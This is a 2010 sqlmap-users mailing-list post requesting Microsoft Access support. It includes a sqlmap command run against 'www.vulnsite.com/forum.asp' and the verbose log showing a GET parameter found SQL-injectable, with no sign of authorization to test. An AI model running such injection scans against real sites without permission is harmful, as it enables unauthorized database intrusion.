[sqlmap-users] Implement please?
Brought to you by:
inquisb
From: Brandon <bmu...@gm...> - 2010-03-19 05:05:44
|
I was wondering if you can please implement Microsoft Access? C:\sqlmap8>sqlmap -u http://www.vulnsite.com/forum.asp?id=11 --current-user -v 2 sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 00:53:35 [00:53:35] [DEBUG] initializing the configuration [00:53:35] [DEBUG] initializing the knowledge base [00:53:35] [DEBUG] cleaning up configuration parameters [00:53:35] [DEBUG] setting the HTTP timeout [00:53:35] [DEBUG] setting the HTTP method to GET [00:53:35] [DEBUG] creating HTTP requests opener object [00:53:35] [DEBUG] parsing XML queries file [00:53:35] [INFO] using 'C:\sqlmap8\output\www.vulnsite.com\session' as session file [00:53:35] [INFO] testing connection to the target url [00:53:37] [INFO] testing if the url is stable, wait a few seconds [00:53:41] [INFO] url is stable [00:53:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [00:53:43] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [00:53:43] [INFO] testing if Cookie parameter 'ASPSESSIONIDASAAARCB' is dynamic [00:53:45] [WARNING] Cookie parameter 'ASPSESSIONIDASAAARCB' is not dynamic [00:53:45] [INFO] testing if GET parameter 'forumid' is dynamic [00:53:45] [DEBUG] got HTTP error code: 500 [00:53:45] [DEBUG] setting match ratio to default value 0.900 [00:53:45] [INFO] confirming that GET parameter 'forumid' is dynamic [00:53:46] [DEBUG] got HTTP error code: 500 [00:53:47] [DEBUG] got HTTP error code: 500 [00:53:47] [INFO] GET parameter 'forumid' is dynamic [00:53:47] [INFO] testing sql injection on GET parameter 'forumid' with 0 parenthesis [00:53:47] [INFO] testing unescaped numeric injection on GET parameter 'forumid' [00:53:49] [DEBUG] got HTTP error code: 500 [00:53:49] [INFO] confirming unescaped numeric injection on GET parameter 'forumid' [00:53:50] [DEBUG] got HTTP error code: 500 [00:53:50] [INFO] GET parameter 'forumid' is unescaped numeric injectable with 0 parenthesis [00:53:50] [INFO] testing for parenthesis on injectable parameter [00:53:51] [DEBUG] got HTTP error code: 500 [00:53:51] [DEBUG] got HTTP error code: 500 [00:53:52] [DEBUG] got HTTP error code: 500 [00:53:52] [INFO] the injectable parameter requires 0 parenthesis [00:53:52] [INFO] testing MySQL [00:53:53] [DEBUG] got HTTP error code: 500 [00:53:53] [WARNING] the back-end DMBS is not MySQL [00:53:53] [INFO] testing Oracle [00:53:54] [DEBUG] got HTTP error code: 500 [00:53:54] [WARNING] the back-end DMBS is not Oracle [00:53:54] [INFO] testing PostgreSQL [00:53:54] [DEBUG] got HTTP error code: 500 [00:53:54] [WARNING] the back-end DMBS is not PostgreSQL [00:53:54] [INFO] testing Microsoft SQL Server [00:53:55] [DEBUG] got HTTP error code: 500 [00:53:55] [WARNING] the back-end DMBS is not Microsoft SQL Server [00:53:55] [ERROR] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Support for this DBMS will be implemented if you ask, just drop us an email [*] shutting down at: 00:53:55 |